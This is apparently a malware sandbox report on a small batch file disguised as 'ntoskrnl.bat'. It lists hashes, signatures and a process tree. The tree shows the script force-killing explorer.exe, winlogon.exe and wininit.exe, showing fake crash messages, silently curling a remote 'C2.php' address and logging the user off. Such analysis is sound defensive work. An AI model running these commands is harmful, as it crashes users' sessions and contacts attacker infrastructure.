Analysis
-
max time kernel
30s -
max time network
14s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
12/09/2024, 15:24
Static task
static1
Behavioral task
behavioral1
Sample
ntoskrnl.bat
Resource
win10-20240404-en
windows10-1703-x64
6 signatures
30 seconds
Behavioral task
behavioral2
Sample
ntoskrnl.bat
Resource
win7-20240708-en
windows7-x64
3 signatures
30 seconds
Behavioral task
behavioral3
Sample
ntoskrnl.bat
Resource
win10v2004-20240802-en
windows10-2004-x64
6 signatures
30 seconds
Behavioral task
behavioral4
Sample
ntoskrnl.bat
Resource
win11-20240802-en
windows11-21h2-x64
6 signatures
30 seconds
General
-
Target
ntoskrnl.bat
-
Size
493B
-
MD5
38e1e4c90b2c943e856bbe7c052ad3a2
-
SHA1
07175f8e4095cf1b60d791a1d1a80908d5c2aca0
-
SHA256
774820fb725e4af50219d46467650d3c7eb7e9a766d6069130f49a28f315d680
-
SHA512
d7b79247122649c1e62185bd943f4f4c9ae48e700a0a836256027d4fa3fa53ee90cc7aa290aca8ad7280337ec9a928b1f86b4d92edad75ac1ac941de7219b655
Score
1/10
Malware Config
Signatures
-
Kills process with taskkill 3 IoCs
pid Process 5088 taskkill.exe 4128 taskkill.exe 5040 taskkill.exe -
Modifies data under HKEY_USERS 15 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "182" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe -
Suspicious behavior: LoadsDriver 64 IoCs
pid Process 2984 Process not Found 4936 Process not Found 3652 Process not Found 3672 Process not Found 4052 Process not Found 4568 Process not Found 4652 Process not Found 1416 Process not Found 4124 Process not Found 1560 Process not Found 2896 Process not Found 1604 Process not Found 1976 Process not Found 2552 Process not Found 2468 Process not Found 2352 Process not Found 4296 Process not Found 1424 Process not Found 1932 Process not Found 4344 Process not Found 2000 Process not Found 8 Process not Found 3028 Process not Found 4116 Process not Found 5064 Process not Found 3764 Process not Found 3592 Process not Found 4664 Process not Found 3480 Process not Found 3496 Process not Found 3564 Process not Found 2744 Process not Found 4472 Process not Found 4780 Process not Found 2588 Process not Found 2296 Process not Found 3116 Process not Found 2780 Process not Found 1556 Process not Found 3756 Process not Found 3800 Process not Found 2156 Process not Found 2360 Process not Found 3996 Process not Found 3312 Process not Found 4380 Process not Found 4440 Process not Found 812 Process not Found 4352 Process not Found 4204 Process not Found 4176 Process not Found 3044 Process not Found 832 Process not Found 916 Process not Found 4976 Process not Found 3824 Process not Found 2476 Process not Found 3304 Process not Found 4416 Process not Found 4264 Process not Found 5080 Process not Found 4128 Process not Found 4120 Process not Found 1500 Process not Found -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 5088 taskkill.exe Token: SeDebugPrivilege 4128 taskkill.exe Token: SeDebugPrivilege 5040 taskkill.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2692 LogonUI.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 1328 wrote to memory of 5088 1328 cmd.exe 84 PID 1328 wrote to memory of 5088 1328 cmd.exe 84 PID 1328 wrote to memory of 2476 1328 cmd.exe 86 PID 1328 wrote to memory of 2476 1328 cmd.exe 86 PID 1328 wrote to memory of 4128 1328 cmd.exe 87 PID 1328 wrote to memory of 4128 1328 cmd.exe 87 PID 1328 wrote to memory of 1500 1328 cmd.exe 88 PID 1328 wrote to memory of 1500 1328 cmd.exe 88 PID 1328 wrote to memory of 1844 1328 cmd.exe 89 PID 1328 wrote to memory of 1844 1328 cmd.exe 89 PID 1328 wrote to memory of 1020 1328 cmd.exe 90 PID 1328 wrote to memory of 1020 1328 cmd.exe 90 PID 1328 wrote to memory of 2836 1328 cmd.exe 96 PID 1328 wrote to memory of 2836 1328 cmd.exe 96 PID 1328 wrote to memory of 5040 1328 cmd.exe 98 PID 1328 wrote to memory of 5040 1328 cmd.exe 98
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ntoskrnl.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1328 -
C:\Windows\system32\taskkill.exetaskkill /f /im explorer.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5088
-
-
C:\Windows\system32\msg.exemsg * Explorer has been crashed.2⤵PID:2476
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im winlogon.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4128
-
-
C:\Windows\system32\msg.exemsg * Windows Account Crashed.2⤵PID:1500
-
-
C:\Windows\system32\msg.exemsg * ERROR 404: FAILED TO FETCH RESOURCE FROM SERVER https://heckergd.serv00.net/data/C2.php2⤵PID:1844
-
-
C:\Windows\system32\curl.execurl heckergd.serv00.net/data/C2.php --silent2⤵PID:1020
-
-
C:\Windows\system32\logoff.exelogoff2⤵PID:2836
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im wininit.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5040
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa39ad055 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2692